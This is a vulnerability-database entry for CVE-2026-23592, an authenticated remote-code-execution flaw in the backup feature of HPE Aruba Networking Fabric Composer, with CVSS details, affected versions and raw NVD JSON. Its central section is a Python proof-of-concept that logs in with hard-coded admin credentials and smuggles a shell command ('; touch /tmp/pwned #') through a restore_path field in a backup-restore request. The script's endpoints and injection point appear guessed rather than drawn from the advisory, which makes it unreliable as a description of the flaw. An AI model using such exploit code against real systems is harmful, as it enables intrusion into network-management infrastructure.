Security Vulnerability Report
CVE-2026-23592 CVSS 7.2 HIGH

CVE-2026-23592

Published: 2026-01-27 18:15:56
Last Modified: 2026-04-15 00:35:42

Description

Insecure file operations in HPE Aruba Networking Fabric Composer’s backup functionality could allow authenticated attackers to achieve remote code execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE Aruba Networking Fabric Composer < 8.0.0
HPE Aruba Networking Fabric Composer, all versions of the 7.x series
HPE Aruba Networking Fabric Composer, all versions of the 6.x series

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23592 PoC - Backup Function RCE
import requests

TARGET = "https://target-arbua-fabric.local"
LOGIN_ENDPOINT = f"{TARGET}/api/v1/auth/login"
BACKUP_ENDPOINT = f"{TARGET}/api/v1/backup/restore"


def exploit():
    # Step 1: Authenticate with high-privilege account
    credentials = {
        "username": "admin",
        "password": "admin_password"
    }
    session = requests.Session()
    auth_response = session.post(LOGIN_ENDPOINT, json=credentials)
    if auth_response.status_code != 200:
        print("[-] Authentication failed")
        return
    print("[+] Authentication successful")
    token = auth_response.json().get('token')
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    # Step 2: Prepare malicious backup with command injection
    # The backup file contains a crafted configuration that triggers RCE
    malicious_backup = {
        "backup_version": "1.0",
        "type": "full_backup",
        "data": {
            "config": {
                "db_host": "localhost",
                "db_name": "fabric_composer",
                "restore_path": "; touch /tmp/pwned #"
            }
        }
    }

    # Step 3: Upload malicious backup to trigger RCE
    print("[+] Uploading malicious backup...")
    exploit_response = session.post(
        BACKUP_ENDPOINT,
        headers=headers,
        json=malicious_backup
    )
    if exploit_response.status_code == 200:
        print("[+] RCE Exploit Successful!")
        print("[+] Check /tmp/pwned on target system")
    else:
        print(f"[-] Exploit failed: {exploit_response.status_code}")
        print(exploit_response.text)


if __name__ == "__main__":
    exploit()

References

HPE security bulletin (vendor advisory): https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04996en_us&docLocale=en_US
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-23592",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-27T18:15:56.383",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Insecure file operations in HPE Aruba Networking Fabric Composer’s backup functionality could allow authenticated attackers to achieve remote code execution. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system."
      },
      {
        "lang": "es",
        "value": "Operaciones de archivo inseguras en la funcionalidad de copia de seguridad de HPE Aruba Networking Fabric Composer podrían permitir a atacantes autenticados lograr la ejecución remota de código. La explotación exitosa podría permitir a un atacante ejecutar comandos arbitrarios en el sistema operativo subyacente."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-78"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04996en_us&docLocale=en_US",
        "source": "[email protected]"
      }
    ]
  }
}